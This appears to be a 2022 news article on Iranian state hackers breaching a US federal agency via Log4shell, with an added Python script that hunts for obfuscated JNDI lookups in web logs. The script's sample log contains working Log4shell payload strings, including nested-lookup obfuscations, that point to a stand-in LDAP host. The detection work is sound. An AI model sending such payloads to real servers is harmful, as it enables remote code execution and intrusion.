November 17, 2022

Iran’s state-sponsored hackers use Log4J to target US government

A federal civilian agency was breached through Log4shell, the widely exploited vulnerability in the Log4j Java logging library, CISA and the FBI have confirmed.

By Claudia Glover

Iranian government-sponsored hackers carried out a cyberattack on a US federal agency, exploiting the infamous Log4shell vulnerability in the Log4j Java logging library to gain access and harvest credentials. Other organisations are being warned to apply patches to affected VMware Horizon servers immediately.

State-sponsored hackers from Iran have been targeting a US government agency. (Photo by Kanisorn Pringthongfoo/Shutterstock)

A “federal civilian executive branch organisation” (FCEB) was breached by Iranian hackers in February, according to an alert issued by America’s Cybersecurity and Infrastructure Security Agency (CISA) and the FBI. The agency in question has not been named, but the FCEB organisations listed on the CISA website include all major US government departments.

Iranian hackers breach federal agency with Log4shell

The unnamed Iranian state-backed hacking group exploited Log4shell to gain initial access through the organisation’s unpatched VMware Horizon server. Once in, they installed cryptomining software and harvested credentials.

CISA and the FBI are urging organisations with affected VMware systems that did not immediately apply the available patches or workarounds “to assume compromise and initiate threat-hunting activities”. The FBI also encourages affected organisations to “assume lateral movement by threat actors” in their networks and to audit privileged accounts.

CISA uncovered the intrusion during a retrospective analysis carried out in April. “By exploiting Log4shell, the actors gained access to a VMware account with administrator and system level access,” reads the advisory.
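The advisory’s call to “assume compromise and initiate threat-hunting activities” starts with finding the exploitation attempts themselves. Log4shell fires when Log4j logs a string containing a `${jndi:...}` lookup, and attackers hide that string behind URL encoding and Log4j’s own nested lookups (`${lower:j}`, `${::-j}`, `${env:X:-j}`), so a plain search for `${jndi:` misses much of it. The following is an added example written for this page, not code from CISA, the FBI or Tech Monitor: a small Python hunt that normalises those tricks away and flags the hits in a set of constructed Apache-style access log lines. The function names (`normalise`, `is_log4shell_probe`, `hunt`), the `SAMPLE_LOG` lines and the IP addresses are all invented for the example.

```python
"""Added example: hunt for Log4Shell-style JNDI lookups in web access logs.

Log4Shell (CVE-2021-44228) triggers when Log4j logs a string containing a
${jndi:...} lookup. A naive search for "${jndi:" misses URL-encoded and
nested-lookup variants, so we undo both before matching.
"""
import re
from urllib.parse import unquote

# What we are ultimately looking for once obfuscation has been peeled away.
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

# ${anything:-value} is Log4j's default-value syntax and resolves to "value".
# Covers ${::-j}, ${env:NOPE:-j}, ${sys:x:-j} and similar single-letter tricks.
# [^${}] keeps each match to one innermost lookup so nesting is handled per round.
DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")

# ${lower:x} / ${upper:x} resolve to x; case is irrelevant to the final check.
CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)

# Constructed sample access log (not real traffic; addresses are documentation
# ranges). Line 2 is a plain payload, line 3 is URL-encoded, line 4 is a nested
# obfuscated payload, and line 5 is a benign "${...}" that must not be flagged.
SAMPLE_LOG = [
    '10.0.0.5 - - [17/Nov/2022:10:01:02 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [17/Nov/2022:10:01:05 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.9:1389/a}"',
    '203.0.113.7 - - [17/Nov/2022:10:01:06 +0000] "GET /portal/?x=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.9%3A1389%2Fb%7D HTTP/1.1" 404 0 "-" "curl/7.85"',
    '203.0.113.7 - - [17/Nov/2022:10:01:09 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${${lower:j}${::-n}${env:NOPE:-d}i:${lower:l}dap://203.0.113.9:1389/c}"',
    '198.51.100.4 - - [17/Nov/2022:10:02:00 +0000] "POST /api/price HTTP/1.1" 200 40 "-" "pricebot ${USD:-1.00}"',
]


def normalise(text: str, max_rounds: int = 20) -> str:
    """Peel URL encoding and nested lookups, innermost first, until the string
    stops changing or a plain ${jndi: appears (stopping early keeps the
    default-value rule from ever rewriting a real jndi lookup)."""
    s = text
    for _ in range(max_rounds):
        if JNDI.search(s):
            break
        nxt = CASE_LOOKUP.sub(r"\1", DEFAULT_LOOKUP.sub(r"\1", unquote(s)))
        if nxt == s:
            break
        s = nxt
    return s


def is_log4shell_probe(text: str) -> bool:
    """True if the text resolves to a JNDI lookup after de-obfuscation."""
    return JNDI.search(normalise(text)) is not None


def hunt(lines):
    """Return (1-based line number, client IP, decoded line) for each hit."""
    hits = []
    for n, line in enumerate(lines, 1):
        decoded = normalise(line)
        if JNDI.search(decoded):
            hits.append((n, line.split(" ", 1)[0], decoded))
    return hits


if __name__ == "__main__":
    for n, ip, decoded in hunt(SAMPLE_LOG):
        print(f"line {n} from {ip}: {decoded}")
```

The same normaliser applies to any request field the application logs, not just the User-Agent and query string used here. A hit is evidence of an attempt, not of success: confirming exploitation means checking whether the server made an outbound LDAP, RMI or DNS connection to the host named in the lookup, which is why the advisory pairs the hunt with an audit of privileged accounts rather than relying on log matching alone.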

Iran’s cyberattack on US and its allies continues

Iranian state-backed hackers regularly attack public sector organisations and elements of the critical national infrastructure of the US and its allies using widely exploited vulnerabilities such as Log4shell. In September, the FBI and CISA, together with the NSA, the Treasury, US Cyber Command (USCC) and the UK’s National Cyber Security Centre (NCSC), released an advisory warning about the Iranian government’s Islamic Revolutionary Guard Corps (IRGC).

The IRGC is a government agency tasked with “defending the Iranian Regime from perceived internal and external threats,” notes the advisory. The IRGC is a well-documented exploiter of Log4shell in VMware Horizon servers, and has also been known to exploit several high-profile flaws in Microsoft’s Exchange Server.


Iran has been upping the ante this year regarding cyberattacks, warns the Microsoft Digital Defense Report 2022, with the US and Israel in its crosshairs. “By 2022, Iranian cyberattacks escalated in target selection and form of attacks,” the report says, adding: “Microsoft assesses an Iran-affiliated actor was most likely responsible for a sophisticated cyberattack that set off emergency rocket sirens in Israel in June probably by using software that adjusts audio over IP networks.”

This threat is unlikely to abate. In fact, it will probably become more pronounced, continues the report. “Iranian actors are likely to remain a threat to US and Israeli transportation and energy companies in the coming year.” 

